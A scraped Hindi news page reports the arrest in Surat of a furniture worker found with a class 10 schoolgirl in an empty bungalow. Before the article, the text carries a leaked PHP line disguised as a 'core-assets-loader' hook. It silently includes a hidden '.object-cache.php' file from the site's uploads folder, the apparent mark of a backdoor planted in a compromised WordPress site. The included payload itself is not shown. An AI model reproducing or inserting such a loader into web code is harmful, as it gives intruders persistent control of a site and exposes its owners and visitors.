add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बंगले में 10वीं की छात्रा संग पकड़ाया, बंगले में फर्नीचर का काम कर रहा था आरोपी; पड़ोसियों को लड़की की स्कूल ड्रेस देख हुआ था शक – SOCH INDIA
Menu

देश
बंगले में 10वीं की छात्रा संग पकड़ाया, बंगले में फर्नीचर का काम कर रहा था आरोपी; पड़ोसियों को लड़की की स्कूल ड्रेस देख हुआ था शक

nobanner

गुजरात के सूरत शहर में एक चौंकाने वाला मामला सामने आया है। यहां अडाजण सोसायटी के एक बंगले में फर्नीचर का काम कर रहा युवक 10वीं की छात्रा को अपने साथ ले आया था। बंगला खाली थी और युवक यहां काम कर रहा था। इसी दौरान वह रंगरेलिया मनाना चोरी-छिपे 10वीं कक्षा में पढ़ने वाली छात्रा को अपने साथ ले आया था। हालांकि, इस दौरान सोसायटी की महिलाओं ने छात्रा को देख लिया था। इसके बाद लोगों ने दोनों को पकड़कर पुलिस को सूचना दी।

छात्रा की मां ने आरोपी को जड़े थप्पड़
पुलिस ने छात्रा से उसके माता-पिता का फोन नंबर लिया और कॉल कर उन्हें यहीं बुला लिया था। छात्रा की मां के आऩे का बाद पता चला कि छात्रा 10वीं में पढ़ती है और सुबह स्कूल जाने के लिए निकली थी। गुस्से में छात्रा की मां ने युवक को दो-तीन थप्पड़ भी जड़ दिए थे। पुलिस ने आरोपी युवक को अरेस्ट कर लिया है।

बंगले में फर्नीचर का काम कर रहा था
स्थानीय लोगों ने बताया कि आरोपी यहां के एक बंगले में फर्नीचर का काम कर रहा था। बंगले के मालिक कहीं बाहर गए हुए हैं। इसी के चलते आरोपी छात्रा को यहां ले आया था। सोसायटी की महिलाएं छात्रा को स्कूल ड्रेस में देखकर ही भांप गई कि कुछ गड़बड़ है। इसके बाद लोगों को इकट्ठा किया और बंगले का दरवाजा खुलवाया। आरोपी के साथ छात्रा बेडरूम में थी। लोगों की आवाज सुनकर आरोपी घबरा गया था।